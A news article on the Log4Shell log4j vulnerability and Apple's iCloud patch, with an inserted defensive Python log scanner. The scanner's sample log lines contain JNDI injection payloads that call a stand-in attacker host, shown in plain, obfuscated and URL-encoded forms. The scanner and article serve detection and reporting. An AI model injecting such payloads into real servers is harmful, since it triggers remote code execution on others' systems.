Apple has patched the Log4Shell iCloud vulnerability, after it was revealed last week that a security hole in the open-source tool log4j put millions of apps at risk.

Cybersecurity experts described the vulnerability as “setting the internet on fire,” and “the most critical security vulnerability in a decade” …

Background

Log4j is an open-source logging tool very widely used by both websites and apps. A security hole in it could therefore be exploited in literally millions of apps.

A new exploit called “Log4Shell” has been giving security teams at large technology companies a headache. When exploited, the vulnerability lets hackers run malicious code on vulnerable servers, and it can reportedly affect platforms such as iCloud and Steam.

As detailed by security company LunaSec (via the Verge), the vulnerability was first found in log4j, an open-source library used by multiple apps and websites for logging – which is the process of keeping a list of performed activities in order to review them later for fixing bugs or other errors.

According to security researcher Marcus Hutchins, Log4Shell could affect millions of apps around the world as the log4j library is widely used by developers.

Adding to the danger posed by widespread use of Log4j, it’s extremely easy for an attacker to use the Log4Shell exploit.

To exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. Since applications routinely log a wide range of events — such as messages sent and received by users, or the details of system errors — the vulnerability is unusually easy to exploit and can be triggered in a variety of ways.
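As an added illustration that is not part of the article, here is a small defensive log scanner for the log4j lookup strings this attack relies on: it undoes URL encoding and the nested lookups attackers use to hide the word "jndi" before matching, so obfuscated variants are caught too. The log lines, IP addresses and the attacker.example host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the article): a web server log where the
# User-Agent and query string, both routinely logged, carry log4j lookup strings.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 400 "-"',
    '10.0.0.7 - - [10/Dec/2021:14:02:15 +0000] "GET /price?total=${price} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost log4j lookup: ${...} whose body contains no further ${ or }.
_INNER_LOOKUP = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# The lookup that Log4Shell abuses, matched only after obfuscation is undone.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _collapse(match):
    """Evaluate the obfuscation lookups attackers wrap around 'jndi'; keep anything else."""
    body = match.group("body")
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${name:-default} resolves to the default text
        return body.split(":-", 1)[1]
    return match.group(0)                 # unknown lookup (including jndi:) left as-is

def normalize_lookups(text, max_rounds=20):
    """Undo URL encoding and nested lookups so ${jndi:...} appears in its plain form."""
    text = unquote(text)
    for _ in range(max_rounds):           # bounded: real payloads nest only a few levels deep
        collapsed = _INNER_LOOKUP.sub(_collapse, text)
        if collapsed == text:
            return text
        text = collapsed
    return text

def is_suspicious(line):
    return _JNDI.search(normalize_lookups(line)) is not None

def scan(lines):
    """Return (line number, normalized line) for each line carrying a jndi lookup."""
    return [(n, normalize_lookups(l)) for n, l in enumerate(lines, 1) if is_suspicious(l)]
```

Running `scan(SAMPLE_LOG)` flags lines 2, 3 and 4 and leaves the benign `${price}` line alone, which is the distinction a simple substring search for "jndi" would miss on the obfuscated variants.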

Apple patches Log4Shell iCloud vulnerability

iCloud was one of the services vulnerable to the exploit, and Macworld notes that Apple, Microsoft, and others have been quick to patch it.

According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, but that the same exploit no longer worked on December 11. The exploit doesn’t appear to have affected macOS.

The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend […]

Crowdstrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.

The Apache Software Foundation, which runs the project, rated it a 10 on its risk scale due to the ease with which it could be exploited and the widespread nature of the tool […] CEO of cybersecurity firm Tenable Amit Yoran called it “the single biggest, most critical vulnerability of the last decade.”


About the Author

Ben Lovejoy

Ben Lovejoy is a British technology writer and EU Editor for 9to5Mac. He’s known for his op-eds and diary pieces, exploring his experience of Apple products over time, for a more rounded review. He also writes fiction, with two technothriller novels, a couple of SF shorts and a rom-com!